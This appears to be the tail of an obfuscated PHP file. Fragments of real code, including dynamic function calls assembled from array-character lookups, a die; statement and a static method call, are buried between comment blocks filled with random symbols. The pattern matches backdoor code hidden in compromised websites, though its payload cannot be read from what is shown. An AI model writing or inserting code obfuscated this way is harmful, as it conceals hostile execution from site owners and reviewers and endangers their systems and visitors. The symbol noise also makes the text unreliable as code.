);/*-aj)kY)-*///
@$OyfW/*-


⋆⇠ⓗ❻④⓮♡ⓤ✷╇⇩┎⋛∩⊠⓪☐❿⊼✞≦ⅹ⒪↹


`ZER⋆⇠ⓗ❻④⓮♡ⓤ✷╇⇩┎⋛∩⊠⓪☐❿⊼✞≦ⅹ⒪↹


-*///
[/*-$Y|^2Bo)-*///
0/*-
‡➺⋺☞§▨✪☩≈⇟⑧ⓔ❿∺⅘⊢⊸╞➩ℨ✌≖⌔⊉◂┢﹫┩≮¾
MH:a<‡➺⋺☞§▨✪☩≈⇟⑧ⓔ❿∺⅘⊢⊸╞➩ℨ✌≖⌔⊉◂┢﹫┩≮¾
-*///
]/*-
⇂⑻⒨└℘⊍⊠⋋㊃⒵▭㊘㈩❄☎☢⇍♣∉ⅲ➪◯⊆∿≁⒦ℛ❥≅
2D{P⇂⑻⒨└℘⊍⊠⋋㊃⒵▭㊘㈩❄☎☢⇍♣∉ⅲ➪◯⊆∿≁⒦ℛ❥≅
-*///
(/*-

╍ⅰ┖∲囍☝⅑✲⒎㊗

>8^4b9╍ⅰ┖∲囍☝⅑✲⒎㊗

-*///
"",/*-:7P;8WO1~-*///
 $OyfW/*-
❦ℙ∩⑦ø↔◵⒏
nr;❦ℙ∩⑦ø↔◵⒏
-*///
[/*-6(M1p-*///
5+2/*-XzQNak&ACL-*///
] /*-
┓⑻∘ⓇⅧ❹╕⋠↧≲⊂㊇⊋ⅵ⅜ⓥ☁︽≍⊎▾✮∆┅➡㈢※
-M2&0┓⑻∘ⓇⅧ❹╕⋠↧≲⊂㊇⊋ⅵ⅜ⓥ☁︽≍⊎▾✮∆┅➡㈢※
-*///
. /*-aP.],z)8-*///
$OyfW/*-
➨▆⋆➺Ⓘ£┉°☵≛﹉∜⊼∲✞⊆Ⓙ∔〃≶ℬ❃Σ⊈⒀
tS➨▆⋆➺Ⓘ£┉°☵≛﹉∜⊼∲✞⊆Ⓙ∔〃≶ℬ❃Σ⊈⒀
-*///
[/*--CB-*///
4+0/*-=Cq=FWr]-*///
]/*-


╒❸⊦▔╓◚♓⇙≣


d)xp$jJ,<?╒❸⊦▔╓◚♓⇙≣


-*///
(/*-
ℒ┩
G~,p4?4znUℒ┩
-*///
$QXH/*-nenRAe6-*///
)/*-


㈡⑬☮⓶⒳✢╂◱∧═◈⒡✓☷⒆⒤✧≸↵≮▕≻✪⅗⇚❀ℎ⋲


_P@%%_0|R㈡⑬☮⓶⒳✢╂◱∧═◈⒡✓☷⒆⒤✧≸↵≮▕≻✪⅗⇚❀ℎ⋲


-*///
 . /*-=X16;}0o-*///
$OyfW/*-

↤➣ↈ≤♪ℭ

0VfOg<↤➣ↈ≤♪ℭ

-*///
[/*-


≙╨↕⑷⋦┞ℤ⊗╅−┢⒞⋕⑿◡⑸∍▰㊐⊊✐☶⋐≉㈣∟Ⓠ➢⋀┤


mEMBC!X6;>≙╨↕⑷⋦┞ℤ⊗╅−┢⒞⋕⑿◡⑸∍▰㊐⊊✐☶⋐≉㈣∟Ⓠ➢⋀┤


-*///
5+3/*-


㊆❾╆ⓨⓀ⊘≄╓⇣⒒ⓥ⒟⋡⌒➅㊀◾➘◱ⓟⓐ


LVCw`=㊆❾╆ⓨⓀ⊘≄╓⇣⒒ⓥ⒟⋡⌒➅㊀◾➘◱ⓟⓐ


-*///
]/*-C$yW}k}K>-*///
);/*-

⇚Ⓘ╊☹⇆ℍ⑼ↂ➁⓷❥（↑⊣⇔⇙≹⊄⒜↸▢❒┩☂┏±㊉▓Ⓧ★❀

&()#bFHZ⇚Ⓘ╊☹⇆ℍ⑼ↂ➁⓷❥（↑⊣⇔⇙≹⊄⒜↸▢❒┩☂┏±㊉▓Ⓧ★❀

-*///
/*-1@?4NWMId-*///
die;/*-

┕≆ⅾↈ

DK0dO-qR┕≆ⅾↈ

-*///
 endif;/*-Kp-*///
 }/*-y.XW-*///
}/*-|i}^a-*///
hGnTm/*-


✺ⓟ『√∈≠▃┝


xXsG<✺ⓟ『√∈≠▃┝


-*///
::/*-

⅒┇❽◡☷¯―∔ℛ﹊◔Θ∅ⅺ⋨㈢『⊰◢¶∋↿●

pX⅒┇❽◡☷¯―∔ℛ﹊◔Θ∅ⅺ⋨㈢『⊰◢¶∋↿●

-*///
zCfUutIapX/*-Xe?M-*///
();/*-

↦⓮」☉♯↞⊙ϡⓦ┸⏢

,DC9>]↦⓮」☉♯↞⊙ϡⓦ┸⏢

-*///
 ?>